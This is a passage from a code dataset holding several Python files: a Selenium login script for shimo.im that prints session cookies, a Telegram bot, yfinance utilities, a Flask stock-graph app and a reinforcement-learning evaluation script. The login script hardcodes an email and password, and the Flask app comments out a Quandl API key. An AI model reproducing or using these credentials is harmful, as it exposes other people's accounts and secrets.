kwargs.get('tstart', '')\n self.tend.data = kwargs.get('tend', '')\n self.name.data = kwargs.get('name', '')\n\n\n","sub_path":"forms/f_new_rasp.py","file_name":"f_new_rasp.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"568941459","text":"from selenium import webdriver\nimport time\n\ntry:\n browser = webdriver.Chrome()\n # 需要安装chrome driver, 和浏览器版本保持一致\n # http://chromedriver.storage.googleapis.com/index.html\n\n browser.get('https://shimo.im/welcome')\n time.sleep(1)\n\n # browser.switch_to.frame(browser.find_elements_by_tag_name('iframe')[0])\n # time.sleep(5)\n btm1 = browser.find_element_by_xpath('//*[@id=\"homepage-header\"]/nav/div[3]/a[2]')\n\n btm1.click()\n print(btm1)\n time.sleep(5)\n\n browser.find_element_by_xpath('//div[@class=\"input\"]/input[@type=\"text\"]').send_keys('15055495@qq.com')\n browser.find_element_by_xpath('//div[@class=\"input\"]/input[@name=\"password\"]').send_keys('test123test456')\n #li/a[@class=\"text-link\"]\n time.sleep(1)\n browser.find_element_by_xpath('//button[contains(@class,\"sm-button submi\")]').click()\n\n cookies = browser.get_cookies() # 获取cookies\n print(cookies)\n time.sleep(3)\n\nexcept Exception as e:\n print(e)\nfinally:\n browser.close()\n","sub_path":"week02/shimo_login.py","file_name":"shimo_login.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419690307","text":"\"\"\"Import TeleBot (PyTelegramBotApi).\"\"\"\nimport telebot\n\nimport functions as functions\nimport markups as m\n\n# main variables\n\nBOT = telebot.TeleBot(TOKEN)\n\n\nclass Task:\n \"\"\"Just a place for entred by user data.\"\"\"\n\n isInProcess = False\n # take \"i\" from loops\n book_code = 0\n subject_code = 0\n # fill during chatting\n subject = 'name'\n author = ''\n task = 0\n # advanced params\n form = 11\n depth = 1\n unit = 0\n lesson = 0\n isLong = True\n # create a list\n output = []\n messages = []\n\n def buildTask(self):\n \"\"\"Create list using entred by user data.\"\"\"\n self.output = []\n self.messages = []\n self.output.append(self.subject)\n self.output.append(self.author)\n self.output.append(self.unit)\n self.output.append(self.lesson)\n self.output.append(self.task)\n self.output.append(self.depth)\n self.output.append(self.isLong)\n self.output.append(self.form)\n self.output.append(self.messages)\n return self.output\n\n def resetTask(self):\n \"\"\"Reset task.\"\"\"\n self.isInProcess = False\n self.book_code = 0\n self.subject_code = 0\n self.subject = 'name'\n self.author = ''\n self.task = 0\n self.depth = 1\n self.unit = 0\n self.lesson = 0\n self.isLong = True\n self.form = 11 # JUST FOR Q VERSION\n self.output = []\n self.messages = []\n\n\nTASK = Task()\n\n\n@BOT.message_handler(commands=['start'])\ndef start_handler(message):\n \"\"\"Handler for /start.\"\"\"\n chat_id = message.chat.id\n TASK.resetTask()\n if not TASK.isInProcess:\n TASK.isInProcess = True\n msg = BOT.send_message(chat_id, 'Предмет?',\n reply_markup=m.subjects_markup)\n BOT.register_next_step_handler(msg, askSubject)\n\n\ndef askSubject(message):\n \"\"\"Ask subject.\"\"\"\n chat_id = message.chat.id\n subject = message.text\n subject_data = functions.check_subject(subject)\n if not subject_data[0]:\n msg = BOT.send_message(chat_id,\n 'Такого предмета нет, введи корректно.')\n BOT.register_next_step_handler(msg, askSubject)\n return\n TASK.subject_code = subject_data[2]\n TASK.subject = subject_data[1]\n TASK.author = subject_data[3]\n TASK.isLong = subject_data[4]\n TASK.form = subject_data[5] # JUST FOR Q VERSION\n TASK.messages = subject_data[6]\n depth = functions.analyze_book(TASK.subject_code)\n TASK.depth = depth\n msg = BOT.send_message(chat_id, TASK.messages[0],\n reply_markup=m.none_markup)\n if depth == 3:\n BOT.register_next_step_handler(msg, askUnit)\n return\n elif depth == 2:\n BOT.register_next_step_handler(msg, askLesson)\n return\n elif depth == 1:\n BOT.register_next_step_handler(msg, askTask)\n return\n else:\n BOT.register_next_step_handler(msg, start_handler)\n return\n\n\ndef askUnit(message):\n \"\"\"Ask unit - first level filter. Most of subjects don't use it.\"\"\"\n chat_id = message.chat.id\n unit = message.text\n unit_data = functions.check_unit(TASK.subject_code, unit)\n if not unit_data[0]:\n msg = BOT.send_message(chat_id, 'Введите корректно.')\n BOT.register_next_step_handler(msg, askUnit)\n return\n TASK.unit = int(unit) - 1\n msg = BOT.send_message(chat_id, TASK.messages[1])\n BOT.register_next_step_handler(msg, askLesson)\n\n\ndef askLesson(message):\n \"\"\"Ask lesson - second level filter.\n\n Some subjects will use it like a 1st one.\n \"\"\"\n chat_id = message.chat.id\n lesson = message.text\n leson_data = functions.check_lesson(TASK.subject_code, TASK.unit, lesson)\n if not leson_data[0]:\n msg = BOT.send_message(chat_id, 'Введите корректно.')\n BOT.register_next_step_handler(msg, askLesson)\n return\n TASK.lesson = int(lesson) - 1\n msg = BOT.send_message(chat_id, TASK.messages[len(TASK.messages)-1])\n BOT.register_next_step_handler(msg, askTask)\n\n\ndef askTask(message):\n \"\"\"Ask task - last filter.\"\"\"\n chat_id = message.chat.id\n task = message.text\n task_data = functions.check_task(TASK.subject_code,\n TASK.unit, TASK.lesson, task)\n # STUB, NEED TASKS AMOUNT OF EVERY BOOK\n if not task_data[0]:\n msg = BOT.send_message(chat_id, 'Введите задание корректно.')\n BOT.register_next_step_handler(msg, askTask)\n return\n TASK.task = int(task) # TASK\n msg = BOT.send_message(chat_id, 'Сейчас найду!')\n output = TASK.buildTask()\n print(output)\n imgLinksList = functions.getImgLinks(output[0], output[1], output[2],\n output[3], output[4], output[5],\n output[6], output[7])\n for i in range(len(imgLinksList)):\n BOT.send_message(chat_id, imgLinksList[i])\n TASK.isInProcess = False\n msg = BOT.send_message(chat_id, 'Изи же!', reply_markup=m.start_markup)\n\n\n@BOT.message_handler(commands=['fast'])\ndef fast_handler(message):\n \"\"\"Handler for /fast.\"\"\"\n if not TASK.isInProcess:\n chat_id = message.chat.id\n msg_text = 'Эта функция в разработке! Она позволит писать запрос одним сообщение по типу \"алг 2 143\". Но я занят и не особо хочу допиливать этот колхоз.'\n BOT.send_message(chat_id, msg_text, reply_markup=m.start_markup)\n\n\nBOT.polling(none_stop=True)\n\n# Done by nybkox :)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"81223049","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Yahoo! Finance market data downloader (+fix for Pandas Datareader)\n# https://github.com/ranaroussi/yfinance\n#\n# Copyright 2017-2019 Ran Aroussi\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom __future__ import print_function\n\nimport requests as _requests_lib\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\nretry_code_list = [429, 500, 502, 503, 504]\nmax_retries=6\nbackoff_factor=0.075\ndef logging_hook(response, *args, **kwargs):\n # url, code, in_list = None, None, None\n # nonlocal url\n # nonlocal code\n # nonlocal in_list\n res = {}\n try:\n if response.status_code in retry_code_list:\n in_list = True\n print('>>>>>>>>>', 'requests')\n print(dir(response))\n print(vars(response))\n res['url'], res['code'] = response.url, response.status_code\n except AttributeError as e:\n if response.code in retry_code_list:\n in_list = True\n print('>>>>>>>>>', 'urllib')\n print(dir(response))\n print(vars(response))\n res['url'], res['code'] = response.url, response.code\n if 'url' in res or 'code' in res:\n print(f'retrying {res.get(\"url\")} [{res[\"code\"]}]')\n\nretry_strategy = Retry(\n total=max_retries,\n backoff_factor=backoff_factor,\n status_forcelist=retry_code_list,\n method_whitelist=[\"HEAD\", \"GET\", \"OPTIONS\"]\n)\nadapter = HTTPAdapter(max_retries=retry_strategy)\n_requests = _requests_lib.Session()\n_requests.mount(\"https://\", adapter)\n_requests.mount(\"http://\", adapter)\n\n_requests.hooks[\"response\"] = [logging_hook]\n\n#moved to bottom of file\n# _requests.get = retryException(exceptions=(Exception,))(_requests.get)\n\nfrom urllib.error import HTTPError\nimport time\nimport functools\nfrom requests.exceptions import ChunkedEncodingError\nfrom http.client import IncompleteRead, HTTPException\n\nimport re as _re\nimport pandas as _pd\nimport numpy as _np\nimport sys as _sys\nimport re as _re\n\ntry:\n import ujson as _json\nexcept ImportError:\n import json as _json\n\n\ndef empty_df(index=[]):\n empty = _pd.DataFrame(index=index, data={\n 'Open': _np.nan, 'High': _np.nan, 'Low': _np.nan,\n 'Close': _np.nan, 'Adj Close': _np.nan, 'Volume': _np.nan})\n empty.index.name = 'Date'\n return empty\n\n\ndef get_json(url, proxy=None):\n html = _requests.get(url=url, proxies=proxy).text\n\n if \"QuoteSummaryStore\" not in html:\n html = _requests.get(url=url, proxies=proxy).text\n if \"QuoteSummaryStore\" not in html:\n return {}\n\n json_str = html.split('root.App.main =')[1].split(\n '(this)')[0].split(';\\n}')[0].strip()\n data = _json.loads(json_str)[\n 'context']['dispatcher']['stores']['QuoteSummaryStore']\n\n # return data\n new_data = _json.dumps(data).replace('{}', 'null')\n new_data = _re.sub(\n r'\\{[\\'|\\\"]raw[\\'|\\\"]:(.*?),(.*?)\\}', r'\\1', new_data)\n\n return _json.loads(new_data)\n\n\ndef camel2title(o):\n return [_re.sub(\"([a-z])([A-Z])\", \"\\g<1> \\g<2>\", i).title() for i in o]\n\n\ndef auto_adjust(data):\n df = data.copy()\n ratio = df[\"Close\"] / df[\"Adj Close\"]\n df[\"Adj Open\"] = df[\"Open\"] / ratio\n df[\"Adj High\"] = df[\"High\"] / ratio\n df[\"Adj Low\"] = df[\"Low\"] / ratio\n\n df.drop(\n [\"Open\", \"High\", \"Low\", \"Close\"],\n axis=1, inplace=True)\n\n df.rename(columns={\n \"Adj Open\": \"Open\", \"Adj High\": \"High\",\n \"Adj Low\": \"Low\", \"Adj Close\": \"Close\"\n }, inplace=True)\n\n df = df[[\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]]\n return df[[\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]]\n\n\ndef back_adjust(data):\n \"\"\" back-adjusted data to mimic true historical prices \"\"\"\n\n df = data.copy()\n ratio = df[\"Adj Close\"] / df[\"Close\"]\n df[\"Adj Open\"] = df[\"Open\"] * ratio\n df[\"Adj High\"] = df[\"High\"] * ratio\n df[\"Adj Low\"] = df[\"Low\"] * ratio\n\n df.drop(\n [\"Open\", \"High\", \"Low\", \"Adj Close\"],\n axis=1, inplace=True)\n\n df.rename(columns={\n \"Adj Open\": \"Open\", \"Adj High\": \"High\",\n \"Adj Low\": \"Low\"\n }, inplace=True)\n\n return df[[\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]]\n\n\ndef parse_actions(data, tz=None):\n dividends = _pd.DataFrame(columns=[\"Dividends\"])\n splits = _pd.DataFrame(columns=[\"Stock Splits\"])\n\n if \"events\" in data:\n if \"dividends\" in data[\"events\"]:\n dividends = _pd.DataFrame(\n data=list(data[\"events\"][\"dividends\"].values()))\n dividends.set_index(\"date\", inplace=True)\n dividends.index = _pd.to_datetime(dividends.index, unit=\"s\")\n dividends.sort_index(inplace=True)\n if tz is not None:\n dividends.index = dividends.index.tz_localize(tz)\n\n dividends.columns = [\"Dividends\"]\n\n if \"splits\" in data[\"events\"]:\n splits = _pd.DataFrame(\n data=list(data[\"events\"][\"splits\"].values()))\n splits.set_index(\"date\", inplace=True)\n splits.index = _pd.to_datetime(splits.index, unit=\"s\")\n splits.sort_index(inplace=True)\n if tz is not None:\n splits.index = splits.index.tz_localize(tz)\n splits[\"Stock Splits\"] = splits[\"numerator\"] / \\\n splits[\"denominator\"]\n splits = splits[\"Stock Splits\"]\n\n return dividends, splits\n\n\nclass ProgressBar:\n def __init__(self, iterations, text='completed'):\n self.text = text\n self.iterations = iterations\n self.prog_bar = '[]'\n self.fill_char = '*'\n self.width = 50\n self.__update_amount(0)\n self.elapsed = 1\n\n def completed(self):\n if self.elapsed > self.iterations:\n self.elapsed = self.iterations\n self.update_iteration(1)\n print('\\r' + str(self), end='')\n _sys.stdout.flush()\n print()\n\n def animate(self, iteration=None):\n if iteration is None:\n self.elapsed += 1\n iteration = self.elapsed\n else:\n self.elapsed += iteration\n\n print('\\r' + str(self), end='')\n _sys.stdout.flush()\n self.update_iteration()\n\n def update_iteration(self, val=None):\n val = val if val is not None else self.elapsed / float(self.iterations)\n self.__update_amount(val * 100.0)\n self.prog_bar += ' %s of %s %s' % (\n self.elapsed, self.iterations, self.text)\n\n def __update_amount(self, new_amount):\n percent_done = int(round((new_amount / 100.0) * 100.0))\n all_full = self.width - 2\n num_hashes = int(round((percent_done / 100.0) * all_full))\n self.prog_bar = '[' + self.fill_char * \\\n num_hashes + ' ' * (all_full - num_hashes) + ']'\n pct_place = (len(self.prog_bar) // 2) - len(str(percent_done))\n pct_string = '%d%%' % percent_done\n self.prog_bar = self.prog_bar[0:pct_place] + \\\n (pct_string + self.prog_bar[pct_place + len(pct_string):])\n\n def __str__(self):\n return str(self.prog_bar)\n\n\n\nclass dotdict(dict):\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError as e:\n print(f'KeyError ({key}):', e, end='\\t')\n if '__parent' in self: print('from', self['__parent'])\n else: print('')\n raise e\n\n def tprint(self):\n dotdict.treePrint(self)\n\n def wrap(self):\n for k,v in self.items():\n if isinstance(v, dict):\n self[k] = dotdict(v).wrap()\n return self\n\n def unwrap(self):\n for k,v in self.items():\n if isinstance(v, dotdict):\n self[k] = dict(v.unwrap())\n return dict(self)\n\n @classmethod\n def treePrint(cls, D, tablevel=0):\n if isinstance(D, dict):\n for k, v in D.items():\n print('\\t'*tablevel + f'{k}: {v if not isinstance(v, dict) else \"-\"}')\n dotdict.treePrint(v, tablevel+1)\n\n \n\n\ndef retry( exceptions=(Exception,),\n total=max_retries, \n backoff_factor=backoff_factor, \n exception_predicate=lambda e : True,\n logging_hook=print):\n '''\n decorator for retrying functions after they throw exceptions\n \n Input:\n exceptions: tuple of Exceptions which should be retried after\n total: maximum numer of times to retry\n backoff_factor: {delay} = {backoff_factor} * 2**{num attempts}\n exception_predicate: handle an Exception e iff exception_predicate(e)\n logging_hook: function called on handled exceptions\n '''\n\n def decorator( f, \n exceptions=exceptions,\n total=total, \n backoff_factor=backoff_factor, \n exception_predicate=exception_predicate,\n logging_hook=logging_hook):\n\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n for i in range(total):\n try:\n return f(*args, **kwargs)\n except exceptions as e:\n if exception_predicate(e):\n logging_hook(i, e)\n delay = backoff_factor * 2**i\n time.sleep(delay)\n # print(f'failed retry number: {i} || {e}')\n error = e\n continue\n else:\n raise e \n # print('giving up')\n raise type(error)('Too many retries...:' + str(error)) from error\n\n return wrapper\n\n return decorator\n\nretryHTTP = functools.partial(\n retry, \n exceptions=(HTTPError,IncompleteRead),\n exception_predicate=lambda e: e.code in retry_code_list,\n logging_hook=logging_hook\n )\n\n_requests.get = retry(exceptions=(ChunkedEncodingError,IncompleteRead))(_requests.get)\n\n\n\n\n@retry(exceptions=(ValueError,))\ndef parse_quotes(data, tz=None):\n timestamps = data[\"timestamp\"]\n ohlc = data[\"indicators\"][\"quote\"][0]\n volumes = ohlc[\"volume\"]\n opens = ohlc[\"open\"]\n closes = ohlc[\"close\"]\n lows = ohlc[\"low\"]\n highs = ohlc[\"high\"]\n\n adjclose = closes\n if \"adjclose\" in data[\"indicators\"]:\n adjclose = data[\"indicators\"][\"adjclose\"][0][\"adjclose\"]\n\n quotes = _pd.DataFrame({\"Open\": opens,\n \"High\": highs,\n \"Low\": lows,\n \"Close\": closes,\n \"Adj Close\": adjclose,\n \"Volume\": volumes})\n\n quotes.index = _pd.to_datetime(timestamps, unit=\"s\")\n quotes.sort_index(inplace=True)\n\n if tz is not None:\n quotes.index = quotes.index.tz_localize(tz)\n\n return quotes\n","sub_path":"yfinance/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396637763","text":"'''\nimport pandas as pd\nimport quandl\nquandl.ApiConfig.api_key = \"xwsP7NGjMxhm6CYLT7C3\"\n\n\nimport argparse\nimport json\nimport pprint\nimport os\nimport sys\nimport urllib\n\n'''\nimport pandas as pd\nimport requests\nimport io\n\n# This client code can run on Python 2.x or 3.x. Your imports can be\n# simpler if you only need one of those.\ntry:\n # For Python 3.0 and later\n from urllib.error import HTTPError\n from urllib.parse import quote\n from urllib.parse import urlencode\nexcept ImportError:\n # Fall back to Python 2's urllib2 and urllib\n from urllib2 import HTTPError\n from urllib import quote\n from urllib import urlencode\n\ndef get_metadata():\n metafile_url = 'WIKI-datasets-codes.csv'\n get_in = True\n if get_in==True:\n\n meta = pd.read_csv(metafile_url, header=None, names=['code', 'descrip'])\n companylookup = [ (descrip[0:descrip.find(' Prices')], code.split('/')[-1]) \n for code, descrip in zip(meta.code, meta.descrip) ]\n \n # compile final database accounting for exceptions\n db = {}\n for company, ticker in companylookup:\n if company[-1] != ')':\n company = company + (' (%s)' % ticker)\n \n db[company] = ticker\n return db\n get_in=False\n return None\n\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.embed import components\nfrom bokeh.palettes import Spectral11\nfrom math import log10\nfrom datetime import date, timedelta\nfrom dateutil.relativedelta import relativedelta\n\n\n\ndef request_api(host, path, api_key, url_params=None):\n \"\"\"Given your API_KEY, send a GET request to the API.\n\n Args:\n host (str): The domain host of the API.\n path (str): The path of the API after the domain.\n API_KEY (str): Your API Key.\n url_params (dict): An optional set of query parameters in the request.\n\n Returns:\n dict: The JSON/CSV response from the request.\n\n Raises:\n HTTPError: An error occurs from the HTTP request.\n \"\"\"\n url_params = url_params or {}\n url = '{0}{1}'.format(host, quote(path.encode('utf8')))\n\n\n print(u'Querying {0} ...'.format(url))\n print('url is',url)\n response = requests.request('GET', url, headers=None, params=url_params)\n return pd.read_csv(io.StringIO(response.text))\n\n\n'''\nDATA Souce: https://www.alphavantage.co\nFree API to get stock data\n'''\nAPI_HOST = \"https://www.alphavantage.co/query?\"\nSEARCH_PATH = \"\"\nuse_key='alpha_vantage_api.key'\nwith open(use_key) as keyfile:\n key_0=keyfile.readlines()\nAPI_KEY= key_0[0][:-1]\n\n\n\ndef get_alpha_vantage_daily_adjusted(api_key, ticker):\n url_params = {\n 'symbol': ticker,\n 'function': \"TIME_SERIES_DAILY_ADJUSTED\",\n 'outputsize': \"compact\",\n 'apikey': api_key,\n 'datatype': 'csv'\n }\n return request_api(API_HOST, SEARCH_PATH, api_key, url_params=url_params)\n\n\n \n\ndef build_graph(ticker,show_closing,show_adj_closing,show_opening,show_high,show_low):\n\n\n month_data = get_alpha_vantage_daily_adjusted(API_KEY,ticker)\n month_data.timestamp = pd.to_datetime(month_data.timestamp) # datatime formatted\n month_data = month_data.iloc[:31] # get last 31 days only\n\n # debug\n #print(\"Data columns\", month_data.columns)\n #print(\"Data x is\",month_data.timestamp)\n #print(\"Data y is\",month_data.close)\n\n x = month_data.timestamp\n y = month_data.close # closing prices\n \n\n plot = figure(title='Data from Alpha Vantage API',\n x_axis_label='date',\n x_axis_type='datetime',\n y_axis_label='price')\n y_values = []\n legend_list = []\n color_list = []\n if show_high:\n y_values.append(month_data.high)\n legend_list.append('Daily high')\n color_list.append('red')\n if show_low:\n y_values.append(month_data.low)\n legend_list.append('Daily low')\n color_list.append('green')\n if show_closing:\n y_values.append(month_data.close)\n legend_list.append('Closing')\n color_list.append('black')\n if show_adj_closing:\n y_values.append(month_data.adjusted_close)\n legend_list.append('Adj_closing')\n color_list.append('pink')\n if show_opening:\n y_values.append(month_data.open)\n legend_list.append('Opening')\n color_list.append('blue')\n\n x_values = [month_data.timestamp]*len(y_values)\n\n #plot.multi_line() multiline plot does manage legeds very well\n for (colr, leg, x, y) in zip(color_list, legend_list, x_values, y_values):\n my_plot = plot.line(x, y, color=colr, legend=leg)\n plot.legend.location='top_left'\n plot.legend.click_policy='hide'\n\n script, div = components(plot)\n\n return script, div\n\n\nfrom flask import Flask, render_template, request, jsonify, redirect, url_for\nfrom flask_bootstrap import Bootstrap\napp = Flask(__name__)\n#bs_app = Bootstrap(app)\n\ndb = get_metadata()\ndefaultheader = \"Company Stock to graph\"\n\n@app.route('/')\ndef render_root():\n return render_template('input.html', header = defaultheader)\n\n@app.route('/autocomplete', methods=['GET'])\ndef autocomplete():\n search = request.args.get('q')\n results = [k for k in db.keys() if k.lower().find(search) != -1]\n return jsonify(matching_results=results)\n\n\n@app.route('/graph', methods=['GET', 'POST'])\ndef graphCompany(company=None):\n if request.method == 'POST':\n\n company = (request.form['company'])\n show_closing = \"show_closing\" in request.form\n show_adj_closing = \"show_adj_closing\" in request.form\n show_opening = \"show_opening\" in request.form\n show_high = \"show_high\" in request.form\n show_low = \"show_low\" in request.form\n #print(\"show_closing\",show_closing)\n\n if company not in db.keys():\n header = \"%s not in database.
Reinput company to graph\" % company \n return render_template('input.html', header=header)\n\n ticker = db[company]\n\n script, div = build_graph(ticker,show_closing,show_adj_closing,show_opening,show_high,show_low)\n return render_template('graph.html', script=script, div=div, \n ticker=ticker , company=company)\n\n else:\n return render_template('input.html', header = defaultheader)\n\nif __name__ == '__main__':\n app.static_folder = 'static' # to render static CSS files\n app.run(debug=False)\n #app.run(port=33507)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"149939861","text":"import argparse\nimport os\n# workaround to unpickle olf model files\nimport sys\n\nimport numpy as np\nimport h5py\nimport torch\nimport gym\n\nfrom a2c_ppo_acktr import algo, utils\nfrom a2c_ppo_acktr.arguments import get_args\nfrom a2c_ppo_acktr.envs import VecPyTorch, make_vec_envs\nfrom a2c_ppo_acktr.utils import get_render_func, get_vec_normalize\n\n\"\"\"\n\npython enjoy.py --env-name FetchPickAndPlace-v1 --algo ppo --episode 10 --save-date 191023_CVAE \\\n--use-latent --latent-dim 1 --task-transition --render --vis-interval 1\n\n\npython enjoy.py --env-name InvertedPendulum-v2 --algo acktr --episode 10 --save-date 190909_hGAIL\n\npython enjoy.py --env-name MountainGolfCar-v1 --algo ppo --episode 10 --save-date 190922_hGAIL \\\n--use-latent --latent-dim 1 --render --vis-interval 1\n\npython enjoy.py --env-name MountainToyCar-v1 --algo ppo --episode 10 --save-date 190928_wasserstein_GAIL_with_latent_p15 \\\n--use-latent --latent-dim 1 --render --vis-interval 1\n\npython enjoy.py --env-name FetchPickAndPlace-v1 --algo ppo --episode 10 \\\n--save-date 191023_wasserstein_GAIL_with_latent_1_p13 --use-latent --latent-dim 1 --task-transition --render --vis-interval 1\n\npython enjoy.py --env-name FetchPickAndPlace-v1 --algo a2c --episode 10 \\\n--save-date 191023_CAVE --use-latent --latent-dim 1 --task-transition --render --vis-interval 1\n\n# MountainToyCar Success Command\npython generate_latent_graph.py --env-name MountainOldCar-v1 --algo ppo --episode 10 \\\n--save-date 191006_standard_GAIL_with_latent_1_p10_v2 --use-latent --latent-dim 1 --task-transition\n\n\"\"\"\n\nsys.path.append('a2c_ppo_acktr')\n\ndef reset_model_machines(model, device):\n model.to(device)\n model.device = device\n\ndef expand_save_folder_dirs(rootdir, args):\n latent_seed_pretrain = str(args.latent_dim) + \"_\" + str(args.seed) + \"_\" + args.pretrain_algo\n\n _filename = os.path.expanduser(rootdir)\n filename = os.path.join(_filename, args.algo, args.gail_algo, args.save_date, latent_seed_pretrain)\n\n try:\n os.makedirs(filename)\n except OSError:\n pass\n\n utils.cleanup_log_dir(filename)\n\n return filename\n\ndef expand_load_folder_dirs(rootdir, args):\n latent_seed_pretrain = str(args.latent_dim) + \"_\" + str(args.seed) + \"_\" + args.pretrain_algo\n\n _filename = os.path.expanduser(rootdir)\n filename = os.path.join(_filename, args.algo, args.gail_algo, args.load_date, latent_seed_pretrain)\n\n return filename\n\nargs = get_args()\n# args.det = not args.non_det\n# print(\"deterministic: \", args.det)\n\n# Define directories\nlog_dir = expand_save_folder_dirs(args.log_dir, args)\npre_log_dir = expand_save_folder_dirs(args.pre_log_dir, args)\neval_log_dir = log_dir + \"_eval\"\npre_eval_log_dir = eval_log_dir + \"_eval\"\nutils.cleanup_log_dir(eval_log_dir)\n\nresult_dir = expand_save_folder_dirs(args.result_dir, args)\npre_result_dir = expand_save_folder_dirs(args.pre_result_dir, args)\nload_dir = expand_load_folder_dirs(args.load_dir, args)\npre_load_dir = expand_load_folder_dirs(args.pre_load_dir, args)\n\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\nif args.test_model == 'pretrained':\n log_dir = pre_log_dir\n eval_log_dir = pre_eval_log_dir\n result_dir = pre_result_dir\n load_dir = pre_load_dir\n\nprint(\"=================================================================\")\nprint(\"0. env_name: \", args.env_name)\nprint(\"1. seed for test: \", args.seed)\nprint(\"2. log directory: \", log_dir)\n\n# We need to use the same statistics for normalization as used in training\nif torch.cuda.is_available():\n if args.use_latent:\n agent, ob_rms, post, discr, trans = torch.load(os.path.join(load_dir, args.env_name + \".pt\"))\n print(\"4. load directory: \", os.path.join(load_dir, args.env_name + \".pt\"))\n\n reset_model_machines(post, device)\n reset_model_machines(discr, device)\n reset_model_machines(trans, device)\n\n else:\n agent, ob_rms = torch.load(os.path.join(load_dir, args.env_name + \".pt\"))\n print(\"4. load directory: \", os.path.join(load_dir, args.env_name + \".pt\"))\n\n reset_model_machines(agent.actor_critic, device)\n\nelse:\n if args.use_latent:\n agent, ob_rms, post, discr, trans = torch.load(os.path.join(load_dir, args.env_name + \".pt\"), map_location='cpu')\n print(\"4. load directory: \", os.path.join(load_dir, args.env_name + \".pt\"))\n\n reset_model_machines(post, device)\n reset_model_machines(discr, device)\n reset_model_machines(trans, device)\n\n else:\n agent, ob_rms = torch.load(os.path.join(load_dir, args.env_name + \".pt\"), map_location='cpu')\n print(\"4. load directory: \", os.path.join(load_dir, args.env_name + \".pt\"))\n\n reset_model_machines(agent.actor_critic, device)\n\nenv = make_vec_envs(args.env_name, args.seed + 1000, 1, None, None,\n device='cpu', allow_early_resets=False)\n\n# Get a render function and vectorize environments\nrender_func = get_render_func(env)\nvec_norm = get_vec_normalize(env)\n\n# if args.render and render_func is not None:\n # render_func('human') # it is not applicable for custom_tasks\n\nif vec_norm is not None:\n vec_norm.eval()\n vec_norm.ob_rms = ob_rms\n\nif args.env_name.find('Bullet') > -1:\n import pybullet as p\n\n torsoId = -1\n for i in range(p.getNumBodies()):\n if (p.getBodyInfo(i)[0].decode() == \"torso\"):\n torsoId = i\n\n\nprint(\"=================================================================\")\nif args.save_result is False:\n print(\"DO NOT SAVE RESULTS\")\n\ndones = []\nepisode_returns = []\n# latent variable evaluation for each episode\nfor e in range(args.episode):\n states, actions, rewards, task_mus, task_sigmas, tasks = [], [], [], [], [], []\n\n obs = env.reset().to(device)\n recurrent_hidden_states = torch.zeros(1, agent.actor_critic.recurrent_hidden_state_size).to(device)\n\n if args.use_latent and args.task_transition:\n # prev_task = torch.normal(\n # mean=torch.zeros(args.num_processes, args.latent_dim),\n # std=torch.ones(args.num_processes, args.latent_dim)).to(device)\n prev_task = torch.randn((args.num_processes, args.latent_dim)).to(device)\n prev_task = torch.zeros_like(prev_task).to(device)\n recurrent_hidden_task_states = torch.zeros(1, args.latent_dim * 4).to(device)\n\n episode_rewards = 0.0\n masks = torch.zeros(1, 1).to(device)\n done = False\n\n while not done:\n with torch.no_grad():\n if args.use_latent and args.task_transition:\n task, task_mu, task_sigma, recurrent_hidden_task_states = trans.act(obs, prev_task,\n recurrent_hidden_task_states,\n masks,\n mean_mode=True,\n use_random_latent=args.use_random_latent,\n use_constant_latent=args.use_constant_latent,\n constant_latent=args.constant_latent)\n\n value, action, action_log_prob, recurrent_hidden_states = agent.actor_critic.act(\n # obs, task, recurrent_hidden_states, masks, deterministic=args.det)\n obs, task, recurrent_hidden_states, masks, deterministic=True)\n else:\n value, action, action_log_prob, recurrent_hidden_states = agent.actor_critic.act(\n # obs, recurrent_hidden_states, masks, deterministic=args.det)\n obs, recurrent_hidden_states, masks, deterministic=True)\n\n next_obs, reward, done, infos = env.step(action.cpu())\n\n episode_rewards += reward\n masks.fill_(0.0 if done else 1.0)\n\n if args.env_name.find('Bullet') > -1:\n if torsoId > -1:\n distance = 5\n yaw = 0\n humanPos, humanOrn = p.getBasePositionAndOrientation(torsoId)\n p.resetDebugVisualizerCamera(distance, yaw, -20, humanPos)\n\n if render_func is not None:\n if args.render and e % args.vis_interval == 0:\n env.render()\n\n states.append(obs.cpu().numpy())\n actions.append(action.cpu().numpy())\n rewards.append(reward.cpu().numpy())\n\n if args.use_latent and args.task_transition:\n task_mus.append(task_mu.cpu().numpy())\n task_sigmas.append(task_sigma.cpu().numpy())\n tasks.append(task.cpu().numpy())\n\n prev_task = task\n\n obs = next_obs.to(device)\n\n if args.env_name == \"FetchPickAndPlace-v1\":\n print(\"env_name: FetchPickAndPlace-v1\")\n if abs(reward) < 0.1:\n done = True\n else:\n done = False\n elif args.env_name == \"MountainToyCar-v1\":\n print(\"env_name: MountainToyCar-v1\")\n if len(states) < 200:\n done = True\n else:\n done = False\n elif args.env_name == 